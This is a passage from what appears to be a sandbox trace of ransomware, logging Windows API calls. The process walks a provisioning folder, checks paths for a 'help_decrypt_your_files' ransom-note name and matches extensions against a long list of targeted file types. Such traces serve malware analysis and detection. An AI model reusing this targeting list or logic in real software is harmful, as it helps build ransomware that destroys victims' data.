.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".provxml") returned 0x0
	[0176.065] FindNextFileW (in: hFindFile=0xfb9470, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9f16127, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9f16127, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa9f16127, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x1939, dwReserved0=0x360066, dwReserved1=0x7d0032, cFileName="Power_3.provxml", cAlternateFileName="POWER_~4.PRO")) returned 1
	[0176.065] lstrcmpW (lpString1="Power_3.provxml", lpString2="..") returned 1
	[0176.065] lstrcmpW (lpString1="Power_3.provxml", lpString2=".") returned 1
	[0176.065] lstrcpyW (in: lpString1=0x1896c4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\"
	[0176.065] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\", lpString2="Power_3.provxml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_3.provxml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_3.provxml"
	[0176.065] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_3.provxml") returned 109
	[0176.065] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0176.066] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_3.provxml", cchLength=0x6d | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_3.provxml") returned 0x6d
	[0176.066] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.066] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_3.provxml", lpSrch="help_decrypt_your_files") returned 0x0
	[0176.066] lstrcpyW (in: lpString1=0x18926c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_3.provxml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_3.provxml") returned="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_3.provxml"
	[0176.066] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_3.provxml") returned 109
	[0176.066] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0176.066] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.067] StrStrW (lpFirst=".provxml", lpSrch=".") returned=".provxml"
	[0176.067] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.067] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".provxml") returned 0x0
	[0176.067] FindNextFileW (in: hFindFile=0xfb9470, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9f62605, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9f62605, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa9f62605, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x1939, dwReserved0=0x360066, dwReserved1=0x7d0032, cFileName="Power_4.provxml", cAlternateFileName="PO21B6~1.PRO")) returned 1
	[0176.067] lstrcmpW (lpString1="Power_4.provxml", lpString2="..") returned 1
	[0176.067] lstrcmpW (lpString1="Power_4.provxml", lpString2=".") returned 1
	[0176.067] lstrcpyW (in: lpString1=0x1896c4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\"
	[0176.067] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\", lpString2="Power_4.provxml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_4.provxml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_4.provxml"
	[0176.068] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_4.provxml") returned 109
	[0176.068] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0176.068] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_4.provxml", cchLength=0x6d | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_4.provxml") returned 0x6d
	[0176.068] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.068] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_4.provxml", lpSrch="help_decrypt_your_files") returned 0x0
	[0176.068] lstrcpyW (in: lpString1=0x18926c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_4.provxml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_4.provxml") returned="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_4.provxml"
	[0176.068] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_4.provxml") returned 109
	[0176.068] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0176.069] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.069] StrStrW (lpFirst=".provxml", lpSrch=".") returned=".provxml"
	[0176.069] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.069] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.